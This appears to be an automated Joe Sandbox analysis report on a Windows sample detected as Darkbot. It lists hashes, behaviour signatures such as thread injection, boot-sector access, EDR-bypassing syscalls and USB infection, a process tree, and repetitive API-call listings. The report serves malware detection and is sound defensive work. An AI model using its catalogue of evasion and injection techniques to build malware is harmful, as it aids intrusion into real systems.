Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
25F.tmp.exe

Overview

General Information

Sample name:25F.tmp.exe
Analysis ID:1582673
MD5:348ad3e983cccbab62c3648f0bcb0f88
SHA1:ba39729ea26b32aee01b4dc57e89f7a909bda3b2
SHA256:9d8445fe53e5494a49bc714ef07ce39b41ad71ea7de73699f0b28bef16bb9da8
Infos:

Detection

Darkbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Yara detected Darkbot
AI detected suspicious sample
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains functionality to access PhysicalDrive, possible boot sector overwrite
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after checking system information)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Changes the start page of internet explorer
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • 25F.tmp.exe (PID: 3252 cmdline: "C:\Users\user\Desktop\25F.tmp.exe" MD5: 348AD3E983CCCBAB62C3648F0BCB0F88)
    • 25F.tmp.exe (PID: 3356 cmdline: C:\Users\user\Desktop\25F.tmp.exe MD5: 348AD3E983CCCBAB62C3648F0BCB0F88)
      • notepad.exe (PID: 3372 cmdline: "C:\Windows\notepad.exe" MD5: B32189BDFF6E577A92BAA61AD49264E6)
      • 25F.tmp.exe (PID: 3380 cmdline: C:\Users\user\Desktop\25F.tmp.exe MD5: 348AD3E983CCCBAB62C3648F0BCB0F88)
        • iexplore.exe (PID: 3396 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 8A590F790A98F3D77399BE457E01386A)
          • iexplore.exe (PID: 3408 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: 4EB098135821348270F27157F7A84E65)
            • iexplore.exe (PID: 3700 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3408 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
        • WmiPrvSE.exe (PID: 652 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 54B7C43C2E89F5CE71B2C255C1CF35E2)
        • QgGhoOpxHPl.exe (PID: 2384 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1440 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2096 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1804 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 892 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1968 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 172 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 492 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1784 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1396 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 816 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1012 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1668 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2836 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1756 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2672 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2708 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2704 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2868 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 3068 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2684 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2688 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1436 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1452 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1060 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2248 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1448 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 2228 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1260 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 1852 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 724 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • QgGhoOpxHPl.exe (PID: 772 cmdline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: 25F.tmp.exe PID: 3356JoeSecurity_DarkbotYara detected DarkbotJoe Security
    Process Memory Space: 25F.tmp.exe PID: 3380JoeSecurity_DarkbotYara detected DarkbotJoe Security
      Process Memory Space: WmiPrvSE.exe PID: 652JoeSecurity_DarkbotYara detected DarkbotJoe Security
        Process Memory Space: QgGhoOpxHPl.exe PID: 2384JoeSecurity_DarkbotYara detected DarkbotJoe Security
          Process Memory Space: QgGhoOpxHPl.exe PID: 1440JoeSecurity_DarkbotYara detected DarkbotJoe Security
            Click to see the 30 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 3408, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 25F.tmp.exeAvira: detected
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.9% probability
            Machine Learning detection for sample
            Source: 25F.tmp.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00361EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,4_2_00361EA0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00368C90 memset,WSAGetLastError,DecryptMessage,4_2_00368C90
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00368B30 memset,EncryptMessage,4_2_00368B30
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00408C90 memset,WSAGetLastError,DecryptMessage,4_2_00408C90
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00401EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,4_2_00401EA0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00408B30 memset,EncryptMessage,4_2_00408B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003D1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,9_2_003D1EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003D8C90 memset,WSAGetLastError,DecryptMessage,9_2_003D8C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003D8B30 memset,EncryptMessage,9_2_003D8B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_00188C90 memset,WSAGetLastError,DecryptMessage,10_2_00188C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_00181EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,10_2_00181EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_00188B30 memset,EncryptMessage,10_2_00188B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_00381EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,11_2_00381EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_00388C90 memset,WSAGetLastError,DecryptMessage,11_2_00388C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_00388B30 memset,EncryptMessage,11_2_00388B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_00418C90 memset,WSAGetLastError,DecryptMessage,12_2_00418C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_00411EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,12_2_00411EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_00418B30 memset,EncryptMessage,12_2_00418B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001B8C90 memset,WSAGetLastError,DecryptMessage,13_2_001B8C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001B1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,13_2_001B1EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001B8B30 memset,EncryptMessage,13_2_001B8B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_00351EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,14_2_00351EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_00358C90 memset,WSAGetLastError,DecryptMessage,14_2_00358C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_00358B30 memset,EncryptMessage,14_2_00358B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_00311EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,15_2_00311EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_00318C90 memset,WSAGetLastError,DecryptMessage,15_2_00318C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_00318B30 memset,EncryptMessage,15_2_00318B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_00381EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,16_2_00381EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_00388C90 memset,WSAGetLastError,DecryptMessage,16_2_00388C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_00388B30 memset,EncryptMessage,16_2_00388B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_00108C90 memset,WSAGetLastError,DecryptMessage,17_2_00108C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_00101EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,17_2_00101EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_00108B30 memset,EncryptMessage,17_2_00108B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_00108C90 memset,WSAGetLastError,DecryptMessage,18_2_00108C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_00101EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,18_2_00101EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_00108B30 memset,EncryptMessage,18_2_00108B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_00221EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,19_2_00221EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_00228C90 memset,WSAGetLastError,DecryptMessage,19_2_00228C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_00228B30 memset,EncryptMessage,19_2_00228B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_00321EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,20_2_00321EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_00328C90 memset,WSAGetLastError,DecryptMessage,20_2_00328C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_00328B30 memset,EncryptMessage,20_2_00328B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_00518C90 memset,WSAGetLastError,DecryptMessage,21_2_00518C90
